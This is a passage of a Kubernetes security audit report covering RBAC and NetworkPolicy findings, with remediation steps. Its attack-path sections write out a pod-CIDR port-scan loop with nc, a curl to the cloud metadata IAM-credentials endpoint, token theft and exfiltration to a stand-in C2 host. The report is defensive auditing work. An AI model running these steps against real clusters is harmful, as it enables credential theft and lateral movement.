Pod/daemon-app-vwsz7 in namespace rbac-fixtures
DaemonSet/daemon-app in namespace rbac-fixtures
Show raw JSON
{
  "rules": [
    {
      "namespace": "",
      "resources": [
        "pods"
      ],
      "source_binding": "crb-pod-create",
      "source_role": "cr-pod-create",
      "verbs": [
        "create"
      ]
    }
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "daemon-app-vwsz7",
      "namespace": "rbac-fixtures"
    },
    {
      "kind": "DaemonSet",
      "name": "daemon-app",
      "namespace": "rbac-fixtures"
    }
  ]
}
MEDIUM

Default ServiceAccount vulnerable/default carries explicit RBAC, so every pod that omits serviceAccountName inherits these rights

KUBE-SA-DEFAULT-002 1 subject Score 8.2

Affected subject

MEDIUM ServiceAccount/vulnerable/default Namespace 8.2
Default ServiceAccount vulnerable/default carries explicit RBAC, so every pod that omits serviceAccountName inherits these rights
Scope · Namespace Namespace vulnerable: every Pod that does not set serviceAccountName mounts the default SA's token
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/default Resource: ServiceAccount/vulnerable/default

ServiceAccount vulnerable/default has explicit RBAC bindings. Every Pod created in vulnerable that does not set spec.serviceAccountName is silently bound to this SA, the kubelet projects its token into the pod, and the workload can call kube-apiserver with whatever permissions the bindings grant. Nobody explicitly asked for any of this.

Aggregated rules:
- verbs [get] on resources [configmaps] (from default-sa-rb/cm-reader in vulnerable)

This is one of the most common privilege-escalation gateways in Kubernetes for two reasons: (1) the default SA is the *implicit* identity for every misconfigured manifest, so a single binding to it propagates to every team in the namespace; (2) developers iterating on a deployment regularly forget to set serviceAccountName and never notice the elevated identity because the API behaves as expected. The Kubernetes RBAC good-practices guide is explicit: "Avoid granting RBAC to the default service account in any namespace," precisely because it converts "forgetting a field" into "granting privilege."

The right model is to leave the default SA permissionless and require every workload to declare its identity explicitly. That turns the implicit default into a fail-closed signal that something is misconfigured.

Impact Any Pod in vulnerable that omits serviceAccountName quietly mounts a token for these RBAC rules. Compromise of any such pod (RCE in any app) yields immediate API access at the granted privileges. Workloads attached: Pod/vulnerable/generic-hostpath-app-68d6b85955-8z24r, Pod/vulnerable/host-ns-app-7cb46d5788-8xp2h, Pod/vulnerable/risky-app-5879fbc5d8-7w424, Pod/vulnerable/root-runner-5db6f7b4bf-8lwsg, Pod/vulnerable/socket-mounts-app-78c5564768-vs8kq, Deployment/vulnerable/generic-hostpath-app, Deployment/vulnerable/host-ns-app, Deployment/vulnerable/risky-app, Deployment/vulnerable/root-runner, Deployment/vulnerable/socket-mounts-app.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker exploits a workload in vulnerable that did not set spec.serviceAccountName (a common omission).
  2. They read /var/run/secrets/kubernetes.io/serviceaccount/token from the pod filesystem.
  3. They curl the kube-apiserver with the token's bearer header. The granted RBAC applies, even though the developer never knew the SA had any permissions.
  4. They use the granted rights (typical patterns: list secrets in the namespace, list pods cluster-wide, exec into other pods) to extend reach.
  5. Because the binding is to default rather than a named SA, future pods in vulnerable *also* inherit this identity. Every redeploy of every workload in the namespace becomes a potential privesc point.
Remediation
Remove all RoleBindings/ClusterRoleBindings to vulnerable/default, create dedicated ServiceAccounts per workload, and set automountServiceAccountToken: false on the default SA.
  1. List the bindings: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "ServiceAccount" and .name == "default" and .namespace == "vulnerable")'.
  2. For each binding, identify the workloads that actually need the right and create a dedicated SA for them (kubectl create sa <workload>-sa -n <ns>); rebind to the dedicated SA.
  3. Delete the bindings to default once consumers are migrated.
  4. Patch the default SA to disable token automounting: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'. Combined with the next step, any pod that forgets serviceAccountName will fail closed instead of inheriting tokens.
  5. Wire enforcement: a Kyverno policy that warns/denies any new RoleBinding whose subjects contain default SA, and any Pod missing an explicit serviceAccountName.
Evidence
Effective rules
get on configmaps
via cm-reader (binding default-sa-rb) in namespace vulnerable
Workloads
Pod/generic-hostpath-app-68d6b85955-8z24r in namespace vulnerable
Pod/host-ns-app-7cb46d5788-8xp2h in namespace vulnerable
Pod/risky-app-5879fbc5d8-7w424 in namespace vulnerable
Pod/root-runner-5db6f7b4bf-8lwsg in namespace vulnerable
Pod/socket-mounts-app-78c5564768-vs8kq in namespace vulnerable
Deployment/generic-hostpath-app in namespace vulnerable
Deployment/host-ns-app in namespace vulnerable
Deployment/risky-app in namespace vulnerable
Deployment/root-runner in namespace vulnerable
Deployment/socket-mounts-app in namespace vulnerable
Show raw JSON
{
  "rules": [
    {
      "namespace": "vulnerable",
      "resources": [
        "configmaps"
      ],
      "source_binding": "default-sa-rb",
      "source_role": "cm-reader",
      "verbs": [
        "get"
      ]
    }
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "generic-hostpath-app-68d6b85955-8z24r",
      "namespace": "vulnerable"
    },
    {
      "kind": "Pod",
      "name": "host-ns-app-7cb46d5788-8xp2h",
      "namespace": "vulnerable"
    },
    {
      "kind": "Pod",
      "name": "risky-app-5879fbc5d8-7w424",
      "namespace": "vulnerable"
    },
    {
      "kind": "Pod",
      "name": "root-runner-5db6f7b4bf-8lwsg",
      "namespace": "vulnerable"
    },
    {
      "kind": "Pod",
      "name": "socket-mounts-app-78c5564768-vs8kq",
      "namespace": "vulnerable"
    },
    {
      "kind": "Deployment",
      "name": "generic-hostpath-app",
      "namespace": "vulnerable"
    },
    {
      "kind": "Deployment",
      "name": "host-ns-app",
      "namespace": "vulnerable"
    },
    {
      "kind": "Deployment",
      "name": "risky-app",
      "namespace": "vulnerable"
    },
    {
      "kind": "Deployment",
      "name": "root-runner",
      "namespace": "vulnerable"
    },
    {
      "kind": "Deployment",
      "name": "socket-mounts-app",
      "namespace": "vulnerable"
    }
  ]
}

Network Policy

10 findings · 5 rules · 0 critical · 7 high · 3 medium · 0 low
HIGH

NetworkPolicy flat-network/allow-broad allows egress to 0.0.0.0/0 (entire internet)

KUBE-NETPOL-WEAKNESS-002 1 subject Score 7.6

Affected subject

HIGH NetworkPolicy/flat-network/allow-broad Object 7.6
NetworkPolicy flat-network/allow-broad allows egress to 0.0.0.0/0 (entire internet)
Scope · Object NetworkPolicy flat-network/allow-broad: the workloads it selects can reach any IPv4/IPv6 destination
Category: Lateral Movement Resource: NetworkPolicy/flat-network/allow-broad Namespace: flat-network

NetworkPolicy flat-network/allow-broad contains an egress rule whose ipBlock.cidr is 0.0.0.0/0. This is the broadest possible CIDR, semantically equivalent to "allow this workload to make outbound connections to any destination." Because NetworkPolicy egress rules are additive, this single rule defeats whatever segmentation other policies tried to build for the selected pods.

Two properties make this rule especially dangerous: (1) 0.0.0.0/0 includes the link-local range that holds the cloud Instance Metadata Service (169.254.169.254/32 on AWS/Azure, metadata.google.internal on GCP), so a compromised pod can scrape node IAM credentials and pivot to the underlying cloud account; (2) 0.0.0.0/0 also includes the Pod and Service CIDRs of the cluster itself, so the rule does not just open the internet. It also opens inter-namespace traffic for the selected pods unless an except: block carves out the cluster ranges.

A correctly-scoped egress policy uses an ipBlock with the specific CIDRs the workload needs (a private VPC peer, a known SaaS provider's published range), or a namespaceSelector + podSelector pair to a named in-cluster dependency. 0.0.0.0/0 should never appear in a production egress allow rule.

Impact Selected workload can reach any IP, including cloud IMDS (credential theft) and arbitrary attacker C2 (data exfiltration). This turns any pod compromise into cloud-account compromise.
How an attacker abuses this
  1. Attacker compromises a pod selected by allow-broad.spec.podSelector.
  2. They hit http://169.254.169.254/latest/meta-data/iam/security-credentials/ and pull the node's IAM credentials. The egress rule allows this because IMDS is inside 0.0.0.0/0.
  3. They use stolen IAM credentials with aws sts get-caller-identity then enumerate the cloud account.
  4. They open an outbound TLS connection to c2.attacker.example on 443 (covered by the same broad rule) and exfiltrate harvested secrets.
  5. They abuse the same broad CIDR to reach other in-cluster Services unless except: carves out the cluster ranges.
Remediation
Replace 0.0.0.0/0 with the specific CIDRs the workload needs, or use namespaceSelector/podSelector for in-cluster destinations, and explicitly carve out the IMDS range.
  1. Inventory what allow-broad's selected pods actually need to reach (use kubectl exec ... -- ss -tnp or VPC flow logs).
  2. Replace the 0.0.0.0/0 rule with a specific allowlist: ipBlocks for required SaaS CIDRs, namespaceSelector/podSelector for in-cluster targets.
  3. At a CNI tier (Calico GlobalNetworkPolicy or Cilium ClusterwideNetworkPolicy), add a non-overridable deny for 169.254.169.254/32.
  4. Validate with a netshoot pod: confirm legitimate destinations resolve and connect; confirm curl --max-time 3 http://169.254.169.254/ and arbitrary internet hosts time out.
  5. Add a Kyverno or OPA Gatekeeper policy that rejects any new NetworkPolicy whose ipBlock CIDR is 0.0.0.0/0 or ::/0.
Evidence
Policyallow-broad
CIDR0.0.0.0/0
Entire IPv4 internet: egress here can exfiltrate to any host
Show raw JSON
{
  "cidr": "0.0.0.0/0",
  "policy": "allow-broad"
}
HIGH

Namespace default has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint

KUBE-NETPOL-COVERAGE-001 6 subjects Score 7.4

Affected subjects (6)

HIGH Namespace/default/default Namespace 7.4
Namespace default has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace default: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/default/default Namespace: default

Namespace default contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in default and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in default, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to default.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n default --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespacedefault
Show raw JSON
{
  "namespace": "default"
}
HIGH Namespace/local-path-storage/local-path-storage Namespace 7.4
Namespace local-path-storage has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace local-path-storage: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/local-path-storage/local-path-storage Namespace: local-path-storage

Namespace local-path-storage contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in local-path-storage and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in local-path-storage, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to local-path-storage.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n local-path-storage --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespacelocal-path-storage
Show raw JSON
{
  "namespace": "local-path-storage"
}
HIGH Namespace/psa-suppressed/psa-suppressed Namespace 7.4
Namespace psa-suppressed has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace psa-suppressed: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/psa-suppressed/psa-suppressed Namespace: psa-suppressed

Namespace psa-suppressed contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in psa-suppressed and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in psa-suppressed, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to psa-suppressed.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n psa-suppressed --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespacepsa-suppressed
Show raw JSON
{
  "namespace": "psa-suppressed"
}
HIGH Namespace/rbac-fixtures/rbac-fixtures Namespace 7.4
Namespace rbac-fixtures has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace rbac-fixtures: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/rbac-fixtures/rbac-fixtures Namespace: rbac-fixtures

Namespace rbac-fixtures contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in rbac-fixtures and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in rbac-fixtures, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to rbac-fixtures.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n rbac-fixtures --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespacerbac-fixtures
Show raw JSON
{
  "namespace": "rbac-fixtures"
}
HIGH Namespace/rbac-ns-fixtures/rbac-ns-fixtures Namespace 7.4
Namespace rbac-ns-fixtures has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace rbac-ns-fixtures: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/rbac-ns-fixtures/rbac-ns-fixtures Namespace: rbac-ns-fixtures

Namespace rbac-ns-fixtures contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in rbac-ns-fixtures and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in rbac-ns-fixtures, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to rbac-ns-fixtures.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n rbac-ns-fixtures --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespacerbac-ns-fixtures
Show raw JSON
{
  "namespace": "rbac-ns-fixtures"
}
HIGH Namespace/vulnerable/vulnerable Namespace 7.4
Namespace vulnerable has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace vulnerable: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/vulnerable/vulnerable Namespace: vulnerable

Namespace vulnerable contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in vulnerable and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in vulnerable, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to vulnerable.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n vulnerable --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespacevulnerable
Show raw JSON
{
  "namespace": "vulnerable"
}
MEDIUM

Workload Deployment/flat-network/unmatched is in a policied namespace but no policy podSelector matches it

KUBE-NETPOL-COVERAGE-002 1 subject Score 6.2

Affected subject

MEDIUM Deployment/flat-network/unmatched Workload 6.2
Workload Deployment/flat-network/unmatched is in a policied namespace but no policy podSelector matches it
Scope · Workload Workload Deployment/flat-network/unmatched (labels map[app:orphan]): covered by no NetworkPolicy in flat-network
Category: Lateral Movement Resource: Deployment/flat-network/unmatched Namespace: flat-network

Workload Deployment/flat-network/unmatched runs in flat-network which has at least one NetworkPolicy, but none of those policies' podSelector clauses match this workload's labels (map[app:orphan]). The Kubernetes NetworkPolicy specification is explicit: a pod is "non-isolated" for ingress/egress until a NetworkPolicy with the corresponding policyTypes entry selects it.

This is the most common misconfiguration in clusters that have started rolling out NetworkPolicies: the operator added policies for the visible apps and forgot a sidecar Job, a CronJob spawned by an operator, a debug Deployment, or a workload whose labels were renamed. "Selected by no policy" is semantically identical to "in a namespace with no policies at all" for this specific pod (full allow-in, full allow-out) even though kubectl get netpol makes the namespace look protected.

The failure mode is invisible at a glance: dashboards say "NetworkPolicies present in namespace," CIS 5.3.2 may pass, but the uncovered workload is exactly the kind of pod attackers love: operator-managed, often privileged, often forgotten.

Impact This single workload retains full allow-all ingress and egress while the rest of the namespace is segmented, making it the easiest pivot point for an attacker who lands anywhere else in the cluster.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Attacker compromises a low-value pod elsewhere in the cluster (CVE in a web app).
  2. They scan the namespace's pod CIDR for reachable services. Other pods in flat-network correctly drop unsolicited traffic, except unmatched, which is uncovered.
  3. They hit unmatched's exposed application port and exploit a known issue, gaining a shell.
  4. From unmatched, attacker has unrestricted egress: hits IMDS for cloud IAM credentials, opens C2 to attacker IPs, uses the pod's mounted ServiceAccount token against the API server.
  5. The attacker now has the network position the rest of the namespace's policies were designed to prevent.
Remediation
Either deploy a namespace-wide default-deny baseline in flat-network so every new pod is automatically covered, or add an explicit policy whose podSelector matches this workload's labels.
  1. Add a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) in flat-network so future pods fail closed.
  2. Write an explicit allow policy whose podSelector matches unmatched's labels and lists only the ingress sources and egress destinations it needs.
  3. Validate by re-running this scanner; the workload should now match at least one policy.
  4. Add a CI check (Kyverno's require-matching-network-policy or an OPA constraint) that fails if a new workload is admitted with labels not covered by any existing NetworkPolicy.
Evidence
Labelsapp=orphan
Show raw JSON
{
  "labels": {
    "app": "orphan"
  }
}
MEDIUM

Namespace ingress-only controls ingress but has no Egress policy (one-way enforcement)

KUBE-NETPOL-COVERAGE-003 1 subject Score 5.8

Affected subject

MEDIUM Namespace/ingress-only/ingress-only Namespace 5.8
Namespace ingress-only controls ingress but has no Egress policy (one-way enforcement)
Scope · Namespace Namespace ingress-only: pods are firewalled inbound but can reach any outbound destination
Category: Lateral Movement Resource: Namespace/ingress-only/ingress-only Namespace: ingress-only

